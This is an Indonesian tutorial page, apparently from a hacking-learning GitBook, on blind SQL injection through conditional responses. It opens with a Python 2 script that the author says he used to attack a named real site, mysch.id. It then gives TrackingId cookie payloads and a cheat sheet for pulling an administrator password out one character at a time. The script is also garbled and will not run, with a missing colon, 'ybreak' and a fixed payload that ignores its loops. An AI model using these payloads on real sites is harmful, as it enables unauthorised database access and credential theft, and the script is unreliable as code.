Bitlab Developers
  • Introduction
  • 🐧Linux
    • Perkenalan Linux
    • DVWA: Install On Kali Linux
    • MYSQL: Kali Linux
    • How To Add Apps In Kali Linux
    • Initial Linux Installation
    • Linux: Fundamentals
    • Linux: Privilege Escalation
  • 💾HackLovers ID
    • Penestration Testing
    • Check Kerentanan Manual
    • Security Models
    • Pentesting Fundamentals
    • Metodologi Hacking
      • Metodologi By Anonputraid
    • Scope Penestration
    • Pengumpulan Informasi
    • 📑Learning Path !
  • SQL Injection
    • Perkenalan SQL-Injection
    • Examining the Database
    • Cheat Sheet
    • Union Attack
    • Subverting application logic
    • Retrieving Hidden Data
    • Blind vulnerabilities
      • Blind SQL-Injection: Triggering Conditional Responses
      • Blind SQL injection: Triggering Time Delays
      • Blind SQL Injection: Triggering SQL Errors
      • Blind SQL injection: Out Of Band (OAST)
  • ⚡Networking
    • Network Fundamental
  • Burp-Suite
    • Burp Suite: List
    • Burp Suite: Profesional Install
    • Burp Suite: The Basic
      • Burp Suite: What is Burp Suite?
      • Burp Suite: How To install
      • Burp Suite: The Dashboard
      • Burp Suite: Navigation
      • Burp Suite: Introduction to the Burp Proxy
      • Burp Suite: Connecting through the Proxy (FoxyProxy)
      • Burp Suite: Proxying HTTPS
      • Burp Suite: The Burp Suite Browser
      • Burp Suite: Scoping and Targeting
      • Burp Suite: Site Map and Issue Definitions
      • Burp Suite: Example Attack
    • Burp Suite: Repeater
      • Burp Suite: What is Repeater?
      • Burp Suite: Basic Usage
      • Burp Suite: Inspector
      • Burp Suite: Views
      • Burp Suite: Challenge
      • Burp Suite: SQLi with Repeater
    • Overview of Burp Suite
      • 📋Burp Suite: Anonputraid Tips
        • Burp Suite: Cross-Site Scripting
  • 🤖Hackthebox
    • Pekernalan Hackthebox
    • Hackthebox Machines
    • Tips & Trick
      • Basic Web Enumeration
      • SSRF & CRLF Attacks
      • Metasploit MsfVenom Apk
      • HashCat: Rules Type Base64
      • Forensic Knowledge
      • Gitlab Laboratory
      • Proxychains & DNS
  • Tryhackme
    • Perkenalan Try Hack Me
    • Learning Path
  • 🖥️Mac Os
    • Catalina Tools
      • Visual Studio Code
    • Dual Boot Kali Linux On Mac
    • How To Change Theme Refind
    • How To Remove Refind
    • Tips to Beautify Terminal
    • Macos For Hacking
    • How To Change Icon Macos
  • Pascal
    • Learning Path
    • Struktur Program Pascal
      • Judul program
      • Bagian Pernyataan/Terproses
      • Bagian Deklarasi
        • Deklarasi prosedur dan Fungsi
        • Deklarasi variabel/perubah
        • Deklarasi Tipe
        • Deklarasi Label
        • Deklarasi Konstanta
    • The Basic
      • Tipe Data
        • Tipe Data standar
          • Tipe Data Integer
          • Tipe data real
          • Tipe Data Karakter
          • Tipe Data String
          • Tipe Sata Boolean
        • Tipe Data Terdefinisi
          • Tipe Data Subjangkauan
          • Tipe Data Terbilang
          • Tipe Data Larik (array)
          • Tipe data record dan file
      • Statemen-statemen
        • Reserved Word
      • Perintah Perintah
        • Statemen Input/output
          • Read/readln(Prosedur)
          • ReadKey(fungsi)
          • Write/writeln(prosedur)
        • Statemen Pengaturan Letak Di Layer
          • Clrscr(prosedur)
          • Gotoxy(prosedur)
          • Delline(prosedur)
          • Insline(prosedur)
          • Delay(prosedur)
        • Statemen Memanipulasi String
          • Concat(fungsi)
          • Copy(fungsi)
          • Delete(prosedur)
          • Insert(Prosedur)
          • Length(fungsi)
          • Pos(fungsi)
          • Str(prosedur)
          • Val(prosedur)
          • Upcase(fungsi)
        • Statemen Perhitungan Aritmatik
          • Abs(Fungsi)
          • Arctan(fungsi)
          • Cos(fungsi)
          • Exp(fungsi)
          • Frac(fungsi)
          • Int(fungsi)
          • LN(fungsi)
          • Sin(fungsi)
          • Sqr(fungsi)
          • SQRT(fungsi)
        • Statemen Transfer Nilai Dari Suatu Variable
          • Chr(fungsi)
          • Ord(fungsi)
          • Round(fungsi)
          • Trunc(fungsi)
        • Statemen Memanipulasi Data
          • Pred(fungsi)
          • Succ(fungsi)
          • INC(fungsi)
          • DEC(fungsi)
        • Statemen Tambahan (warna,suara dan window)
          • Sound(prosedur)
          • TextMode(prosedur)
          • Window(prosedur)
          • Textbackground(prosedur)
          • TextColor(prosedur)
      • Bentuk Perulangan
        • Perulangan FOR
          • Perulangan FOR negatif
          • Perulangan FOR positif
          • Perulangan FOR tersarang
        • Perulangan WHILE-DO
      • Record
        • Deklarasi Record
        • Statemen with
        • Record Dalam Array
        • Field Record Bertipe Array
        • Tipe Data Record Dengan Field Tipe Record
      • Procedure
        • Template Latihan Proseduce
        • Parameter Dalam Procedure
        • Pengiriman parameter Secara Nilai
        • Pengiriman Parameter Secara Acuan (By Reference)
        • Procedure Memanggil Procedure Yang Lain
        • Procedure Tersarang
        • Procedure Memanggil Dirinya Sendiri (Rekursi)
      • Function
        • Rekursi Pada Function
        • Parameter Nilai Dalam Function
        • Function Dengan Parameter Acuan
        • Function tanpa parameter
      • File Teks
        • Membuat File Teks
        • Deklarasi File Teks
        • Pernyataan Rese
        • Pernyataan Rewrite
        • Pernyataan Close
      • File Binary
      • Pascal Library
        • Free Pascal Game
        • SDL: Simple DirectMedia Layer
          • SDL: Language Bindings
        • How To Install ?
      • Pascal Examples
        • Pascal Exercises
          • Exersices 1
          • Exersices 2
          • Exersices 3
          • Exersices 4
        • Pascal Quiz
          • Question 1
      • Perkenalan Pascal
  • Dart Programming
    • Install Dart On Linux
  • ⚙️Technical
    • Pengantar Sistem Informasi
    • Perkenalan UEFI & Legacy
  • Git Dan Github
    • Download Git & Setting
    • Membuat Portofolio GitHub
  • Xampp
    • Error Mysql Xampp
Powered by GitBook
On this page

Was this helpful?

  1. SQL Injection
  2. Blind vulnerabilities

Blind SQL-Injection: Triggering Conditional Responses

Author: Anonputraid

Last updated 3 years ago

Was this helpful?

Triggering Conditional Responses

Source Code Ini Pernah Saya Gunakan Untuk Merentas Situs . Saya Menggunakan Teknik Triggering Conditional Responses Untuk Memeriksa Satu Persatu Nama Database Yang Ada Pada Server Mysch.id.

#!/usr/bin/python2
import requests
import time,sys

web = "http://mysch.id/cari"
max = 20000
for i in range(1,100):
   for x in range(0x20,0x7f)
        payload = "Exploit' OR BINARY substring(database(),1,1) = 'm' -- -"
        data = {"keyword": payload, "cari": "cari"}
        result = requests.post(web, data)
        response = result.content

        if len(response) > max:
              status = True
        elif len(response) < max:
              status = False
           if status == True:
              sys.stdout.write(chr(x))
              sys.stdout.flush()
              ybreak
print ""

Apakah Anda Pernah Melihat Web Yang Menyediakan Header Cookie Seperti Ini: 

 Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4

Disini Anda Sudah Memiliki Jalan Masuk Untuk Mengirim Data Kedalam Server. Karna Server Menset Header Cookie Nya Dengan Nama TrackingId Dengan Begitu Apapun Data Yang Kita Kirim Menggunakan Name: TrackingId Maka Data Tersebut Akan Direspon Oleh Server Karna Server Akan Memeriksa Seperti Ini: 

 SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'

Seperti Yang Kita Tau Bahwa Query Seperti Ini Itu Rentan Terhadap Serangan SQL-Injection. Tetapi Masalah Nya, Hasil Query Yang Dikirim Tidak Akan Dikembalikan Kepengguna. Namun Kita Masih Dapat Memeriksa Apakah Aplikasi Rentan Dengan Cara Melihat Respon Server. Jika Server Mengenali Data Yang Dikirim Maka Server Akan Menampilkan Pesan Selamat Datang.

Logika Respon Pada Server Tersebut Cukup Untuk Mengekploitasi Kerentanan Pada Server Tersebut. Untuk Melihat Cara Kerja Teknik Logika Boolean Ini. Misal Nya Disini Kita Ingin Menyerang Cookie Tersebut:

 Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4

Semisal Contoh Disini Saya Akan Mengirim 2 Data:

…xyz' AND '1'='1
…xyz' AND '1'='2

Data Pertama Itu Bernilai True, Dan Data Kedua Bernilai False. Data Yang Bernilai True Akan Membuat Server Mengembalikan Data "Selamat Datang" Pada Server. Sedangkan Data Yang Bernilai False. Server Tidak Akan Mengembalikan Data Apapun.

Serangan Ini Memungkin Kan Kita Untuk Mengetrack Satu Persatu Untuk Mendapatkan Informasi Pada Server. Kami dapat secara sistematis menentukan kata sandi untuk pengguna ini dengan mengirimkan serangkaian input untuk menguji kata sandi satu karakter pada satu waktu.

Untuk melakukan ini, kita mulai dengan input berikut:

xyz' AND SUBSTRING((SELECT pass FROM Users WHERE user = 'admin'), 1, 1) > 'm

Ini mengembalikan pesan "Selamat datang kembali", yang menunjukkan bahwa kondisi yang disuntikkan Bernilai True, sehingga Kita Mendapatkan Informasi Bahwa karakter pertama kata sandi Server lebih besar dari m.

Selanjutnya, kami mengirimkan input berikut:

xyz' AND SUBSTRING((SELECT pass FROM Users WHERE user = 'admin'), 1, 1) > 't

Ini tidak mengembalikan pesan "Selamat datang kembali", yang menunjukkan bahwa kondisi yang disuntikkan Benilai False, sehingga karakter pertama kata sandi tidak lebih besar dari t.

Lalu Menggunakan Mengirim Input Berikut:

xyz' AND SUBSTRING((SELECT pass FROM Users WHERE user = 'admin'), 1, 1) = 's

yang mengembalikan pesan "Selamat datang kembali", dengan demikian Dapat Kita Pastikan bahwa karakter pertama kata sandi adalah s:

Kami dapat melanjutkan proses ini untuk secara Otomatis menentukan kata sandi lengkap untuk Administratorpengguna.

Berikut Ini Adalah Cheat Sheet:

Memeriksa Apakah Ada Table Users

' AND (SELECT 'a' FROM users LIMIT 1)='a

Memeriksa Apakah Ada Username "administrator"

' AND (SELECT 'a' FROM users WHERE username='administrator')='a

Memeriksa Panjang Password:

' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a

Memeriksa Password:

' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a

  • SUBSTRING() Berfungsi Untuk Mengekstrak Satu Karakter Dari Kata Sandi, Dan Mengujinya Terhadap Nilai Tertentu. Kita Bisa Melakukan Serangan Dengan Menggilir Character,Dan Posisi Kusor Dengan Itruder

Anda Bisa Mengubah Angka Berikut Nya Dengan Cara Berikut:

TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

  • SUBSTRING(password,2,1)

Itu SUBSTRINGfungsi disebut SUBSTRpada beberapa jenis database. Untuk lebih jelasnya, SIlahkan Anda Check .

Cheat Sheet
Mysch ID
Page cover image